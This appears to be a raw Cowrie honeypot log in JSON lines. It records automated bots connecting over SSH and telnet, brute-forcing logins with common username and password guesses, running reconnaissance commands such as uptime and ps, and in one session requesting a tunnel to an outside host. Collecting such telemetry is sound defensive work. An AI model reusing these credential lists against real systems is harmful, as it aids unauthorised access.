{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42704,"dst_ip":"1.2.3.4","dst_port":23,"session":"be6bb1283aa2","protocol":"telnet","message":"New connection: 212.227.235.229:42704 (1.2.3.4:23) [session: be6bb1283aa2]","sensor":"my-vps","timestamp":"2025-08-31T00:00:05.978303Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:00:06.182922Z","src_ip":"212.227.235.229","session":"be6bb1283aa2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:00:06.239227Z","src_ip":"212.227.235.229","session":"be6bb1283aa2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43696,"dst_ip":"1.2.3.4","dst_port":23,"session":"a4c320a96a41","protocol":"telnet","message":"New connection: 212.227.125.160:43696 (1.2.3.4:23) [session: a4c320a96a41]","sensor":"my-vps","timestamp":"2025-08-31T00:00:39.022318Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43898,"dst_ip":"1.2.3.4","dst_port":23,"session":"85883883b04a","protocol":"telnet","message":"New connection: 212.227.125.160:43898 (1.2.3.4:23) [session: 85883883b04a]","sensor":"my-vps","timestamp":"2025-08-31T00:00:41.523969Z"}
{"eventid":"cowrie.session.closed","duration":0.23174118995666504,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:00:41.755657Z","src_ip":"212.227.125.160","session":"85883883b04a"}
{"eventid":"cowrie.session.closed","duration":2.734386682510376,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:00:41.756600Z","src_ip":"212.227.125.160","session":"a4c320a96a41"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57012,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ce8c1de3846","protocol":"ssh","message":"New connection: 217.72.205.35:57012 (1.2.3.4:22) [session: 0ce8c1de3846]","sensor":"my-vps","timestamp":"2025-08-31T00:00:56.506056Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:00:56.507361Z","src_ip":"217.72.205.35","session":"0ce8c1de3846"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:01:29.280760Z","src_ip":"212.227.125.160","session":"c40902367474"}
{"eventid":"cowrie.session.closed","duration":180.56128549575806,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:01:29.285377Z","src_ip":"212.227.125.160","session":"c40902367474"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42092,"dst_ip":"1.2.3.4","dst_port":23,"session":"c1d987b95955","protocol":"telnet","message":"New connection: 212.227.235.229:42092 (1.2.3.4:23) [session: c1d987b95955]","sensor":"my-vps","timestamp":"2025-08-31T00:01:47.583032Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37502,"dst_ip":"1.2.3.4","dst_port":23,"session":"3abc5031ee4b","protocol":"telnet","message":"New connection: 212.227.125.160:37502 (1.2.3.4:23) [session: 3abc5031ee4b]","sensor":"my-vps","timestamp":"2025-08-31T00:01:55.503535Z"}
{"eventid":"cowrie.session.closed","duration":13.105390071868896,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:02:00.688352Z","src_ip":"212.227.235.229","session":"c1d987b95955"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47435,"dst_ip":"1.2.3.4","dst_port":22,"session":"b405a7fe2698","protocol":"ssh","message":"New connection: 212.227.125.160:47435 (1.2.3.4:22) [session: b405a7fe2698]","sensor":"my-vps","timestamp":"2025-08-31T00:02:06.744841Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:02:06.746255Z","src_ip":"212.227.125.160","session":"b405a7fe2698"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47720,"dst_ip":"1.2.3.4","dst_port":22,"session":"78694768e63d","protocol":"ssh","message":"New connection: 212.227.125.160:47720 (1.2.3.4:22) [session: 78694768e63d]","sensor":"my-vps","timestamp":"2025-08-31T00:02:06.857916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:02:06.858730Z","src_ip":"212.227.125.160","session":"78694768e63d"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T00:02:06.972613Z","src_ip":"212.227.125.160","session":"78694768e63d"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:02:07.315199Z","src_ip":"212.227.125.160","session":"78694768e63d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T00:02:07.429637Z","session":"78694768e63d"}
{"eventid":"cowrie.session.closed","duration":31.423922538757324,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:02:26.927360Z","src_ip":"212.227.125.160","session":"3abc5031ee4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58742,"dst_ip":"1.2.3.4","dst_port":23,"session":"174fba8504fb","protocol":"telnet","message":"New connection: 212.227.125.160:58742 (1.2.3.4:23) [session: 174fba8504fb]","sensor":"my-vps","timestamp":"2025-08-31T00:02:48.085696Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:02:48.169898Z","src_ip":"212.227.125.160","session":"174fba8504fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:02:48.191485Z","src_ip":"212.227.125.160","session":"174fba8504fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:03:06.250288Z","src_ip":"212.227.235.229","session":"be6bb1283aa2"}
{"eventid":"cowrie.session.closed","duration":180.27696084976196,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:03:06.255158Z","src_ip":"212.227.235.229","session":"be6bb1283aa2"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:03:16.858959Z","src_ip":"212.227.125.160","session":"78694768e63d"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":60953,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4acc3334191","protocol":"ssh","message":"New connection: 80.94.95.112:60953 (1.2.3.4:22) [session: b4acc3334191]","sensor":"my-vps","timestamp":"2025-08-31T00:03:26.450373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T00:03:31.866379Z","src_ip":"80.94.95.112","session":"b4acc3334191"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T00:03:31.895704Z","src_ip":"80.94.95.112","session":"b4acc3334191"}
{"eventid":"cowrie.login.failed","username":"admin","password":"02111988","message":"login attempt [admin/02111988] failed","sensor":"my-vps","timestamp":"2025-08-31T00:03:32.102798Z","src_ip":"80.94.95.112","session":"b4acc3334191"}
{"eventid":"cowrie.login.failed","username":"admin","password":"02101991","message":"login attempt [admin/02101991] failed","sensor":"my-vps","timestamp":"2025-08-31T00:03:33.135154Z","src_ip":"80.94.95.112","session":"b4acc3334191"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45514,"dst_ip":"1.2.3.4","dst_port":22,"session":"595c73189474","protocol":"ssh","message":"New connection: 212.227.125.160:45514 (1.2.3.4:22) [session: 595c73189474]","sensor":"my-vps","timestamp":"2025-08-31T00:03:33.605468Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01121978","message":"login attempt [admin/01121978] failed","sensor":"my-vps","timestamp":"2025-08-31T00:03:34.167858Z","src_ip":"80.94.95.112","session":"b4acc3334191"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:03:34.684842Z","src_ip":"212.227.125.160","session":"595c73189474"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:03:34.685596Z","src_ip":"212.227.125.160","session":"595c73189474"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01071994","message":"login attempt [admin/01071994] failed","sensor":"my-vps","timestamp":"2025-08-31T00:03:35.200457Z","src_ip":"80.94.95.112","session":"b4acc3334191"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01021982","message":"login attempt [admin/01021982] failed","sensor":"my-vps","timestamp":"2025-08-31T00:03:36.233248Z","src_ip":"80.94.95.112","session":"b4acc3334191"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:03:37.266351Z","src_ip":"80.94.95.112","session":"b4acc3334191"}
{"eventid":"cowrie.login.success","username":"root","password":"0043278933","message":"login attempt [root/0043278933] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:03:40.618708Z","src_ip":"212.227.125.160","session":"595c73189474"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:03:43.642191Z","src_ip":"212.227.125.160","session":"595c73189474"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T00:03:43.642929Z","src_ip":"212.227.125.160","session":"595c73189474"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:03:45.541752Z","src_ip":"212.227.125.160","session":"595c73189474"}
{"eventid":"cowrie.session.closed","duration":"11.9","message":"Connection lost after 11.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:03:45.542994Z","src_ip":"212.227.125.160","session":"595c73189474"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35786,"dst_ip":"1.2.3.4","dst_port":22,"session":"907e762cd4e9","protocol":"ssh","message":"New connection: 201.148.180.50:35786 (1.2.3.4:22) [session: 907e762cd4e9]","sensor":"my-vps","timestamp":"2025-08-31T00:03:53.466207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:03:54.959398Z","src_ip":"201.148.180.50","session":"907e762cd4e9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:03:54.960450Z","src_ip":"201.148.180.50","session":"907e762cd4e9"}
{"eventid":"cowrie.login.success","username":"root","password":"0043278933","message":"login attempt [root/0043278933] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:04:00.687272Z","src_ip":"201.148.180.50","session":"907e762cd4e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:04:04.281764Z","src_ip":"201.148.180.50","session":"907e762cd4e9"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T00:04:04.282542Z","src_ip":"201.148.180.50","session":"907e762cd4e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:04:05.514889Z","src_ip":"201.148.180.50","session":"907e762cd4e9"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:04:05.516022Z","src_ip":"201.148.180.50","session":"907e762cd4e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50330,"dst_ip":"1.2.3.4","dst_port":23,"session":"941f3a8d7333","protocol":"telnet","message":"New connection: 212.227.125.160:50330 (1.2.3.4:23) [session: 941f3a8d7333]","sensor":"my-vps","timestamp":"2025-08-31T00:05:14.721399Z"}
{"eventid":"cowrie.session.closed","duration":1.2760114669799805,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:05:15.997342Z","src_ip":"212.227.125.160","session":"941f3a8d7333"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50336,"dst_ip":"1.2.3.4","dst_port":23,"session":"124fd7bedf34","protocol":"telnet","message":"New connection: 212.227.125.160:50336 (1.2.3.4:23) [session: 124fd7bedf34]","sensor":"my-vps","timestamp":"2025-08-31T00:05:16.176179Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:05:16.744729Z","src_ip":"212.227.125.160","session":"124fd7bedf34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:05:17.178330Z","src_ip":"212.227.125.160","session":"124fd7bedf34"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-31T00:05:17.263438Z","src_ip":"212.227.125.160","session":"124fd7bedf34"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T00:05:17.420942Z","src_ip":"212.227.125.160","session":"124fd7bedf34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","size":514,"shasum":"2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:05:18.525901Z","src_ip":"212.227.125.160","session":"124fd7bedf34"}
{"eventid":"cowrie.session.closed","duration":2.354060649871826,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:05:18.530171Z","src_ip":"212.227.125.160","session":"124fd7bedf34"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":45501,"dst_ip":"1.2.3.4","dst_port":22,"session":"6016ed7f472e","protocol":"ssh","message":"New connection: 80.94.95.15:45501 (1.2.3.4:22) [session: 6016ed7f472e]","sensor":"my-vps","timestamp":"2025-08-31T00:05:28.006880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T00:05:28.007702Z","src_ip":"80.94.95.15","session":"6016ed7f472e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T00:05:28.073529Z","src_ip":"80.94.95.15","session":"6016ed7f472e"}
{"eventid":"cowrie.login.failed","username":"macey","password":"macey","message":"login attempt [macey/macey] failed","sensor":"my-vps","timestamp":"2025-08-31T00:05:28.418552Z","src_ip":"80.94.95.15","session":"6016ed7f472e"}
{"eventid":"cowrie.login.failed","username":"macey","password":"macey1","message":"login attempt [macey/macey1] failed","sensor":"my-vps","timestamp":"2025-08-31T00:05:29.486433Z","src_ip":"80.94.95.15","session":"6016ed7f472e"}
{"eventid":"cowrie.login.failed","username":"macey","password":"macey123","message":"login attempt [macey/macey123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:05:30.555069Z","src_ip":"80.94.95.15","session":"6016ed7f472e"}
{"eventid":"cowrie.login.failed","username":"macey","password":"macey1234","message":"login attempt [macey/macey1234] failed","sensor":"my-vps","timestamp":"2025-08-31T00:05:31.623573Z","src_ip":"80.94.95.15","session":"6016ed7f472e"}
{"eventid":"cowrie.login.failed","username":"macey","password":"macey12345","message":"login attempt [macey/macey12345] failed","sensor":"my-vps","timestamp":"2025-08-31T00:05:32.691331Z","src_ip":"80.94.95.15","session":"6016ed7f472e"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:05:33.758358Z","src_ip":"80.94.95.15","session":"6016ed7f472e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:05:48.206448Z","src_ip":"212.227.125.160","session":"174fba8504fb"}
{"eventid":"cowrie.session.closed","duration":180.12692880630493,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:05:48.211405Z","src_ip":"212.227.125.160","session":"174fba8504fb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53960,"dst_ip":"1.2.3.4","dst_port":22,"session":"614cc297c2a1","protocol":"ssh","message":"New connection: 217.72.205.35:53960 (1.2.3.4:22) [session: 614cc297c2a1]","sensor":"my-vps","timestamp":"2025-08-31T00:07:47.171363Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:07:47.172523Z","src_ip":"217.72.205.35","session":"614cc297c2a1"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.167","src_port":26628,"dst_ip":"1.2.3.4","dst_port":23,"session":"6752a6f13f32","protocol":"telnet","message":"New connection: 194.165.16.167:26628 (1.2.3.4:23) [session: 6752a6f13f32]","sensor":"my-vps","timestamp":"2025-08-31T00:07:53.134715Z"}
{"eventid":"cowrie.session.closed","duration":0.0010645389556884766,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:07:53.135687Z","src_ip":"194.165.16.167","session":"6752a6f13f32"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.167","src_port":26715,"dst_ip":"1.2.3.4","dst_port":23,"session":"d613e0231335","protocol":"telnet","message":"New connection: 194.165.16.167:26715 (1.2.3.4:23) [session: d613e0231335]","sensor":"my-vps","timestamp":"2025-08-31T00:07:53.148963Z"}
{"eventid":"cowrie.session.closed","duration":0.015495538711547852,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:07:53.164406Z","src_ip":"194.165.16.167","session":"d613e0231335"}
